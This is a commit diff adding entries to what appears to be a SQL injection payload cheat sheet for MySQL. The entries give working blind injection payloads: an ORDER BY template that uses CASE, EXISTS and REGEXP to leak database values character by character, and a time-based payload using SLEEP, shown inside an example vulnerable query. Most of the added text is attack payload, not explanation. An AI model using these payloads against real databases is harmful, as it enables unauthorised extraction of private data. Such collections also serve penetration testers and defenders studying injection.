From https://twitter.com/secgus

MySQL Blind Queries and Data Exfiltration via the ORDER BY clause.
2024-05-20 14:26:18 +02:00 · 2020-03-01 21:15:19 +00:00 · 2020-03-01 21:15:19 +00:00 · 29fac06023
parent 74f2dfccca
commit 29fac06023
1 changed files with 23 additions and 0 deletions
--- a/Injection/MySQL
+++ b/Injection/MySQL
@ -232,6 +232,29 @@ Works with `MySQL >= 5.1`
 ?id=1 AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'
 ```

+### MySQL Blind SQL Injection in ORDER BY clause using a binary query and REGEXP
+
+This query basically orders by one column or the other, depending on whether the EXISTS() returns a 1 or not.
+For the EXISTS() function to return a 1, the REGEXP query needs to match up, this means you can bruteforce blind values character by character and leak data from the database without direct output.
+
+```
+[...] ORDER BY (SELECT (CASE WHEN EXISTS(SELECT [COLUMN] FROM [TABLE] WHERE [COLUMN] REGEXP "^[BRUTEFORCE CHAR BY CHAR].*" AND [FURTHER OPTIONS / CONDITIONS]) THEN [ONE COLUMN TO ORDER BY] ELSE [ANOTHER COLUMN TO ORDER BY] END)); -- -
+```
+
+### MySQL Blind SQL Injection binary query using REGEXP.
+
+Payload:
+```
+' OR (SELECT (CASE WHEN EXISTS(SELECT name FROM items WHERE name REGEXP "^a.*") THEN SLEEP(3) ELSE 1 END)); -- -
+```
+
+Would work in the query (where the "where" clause is the injection point):
+```
+SELECT name,price FROM items WHERE name = '' OR (SELECT (CASE WHEN EXISTS(SELECT name FROM items WHERE name REGEXP "^a.*") THEN SLEEP(3) ELSE 1 END)); -- -';
+```
+
+In said query, it will check to see if an item exists in the "name" column in the "items" database that starts with an "a". If it will sleep for 3 seconds per item.
+
 ### MYSQL Blind using a conditional statement

 TRUE: `if @@version starts with a 5`: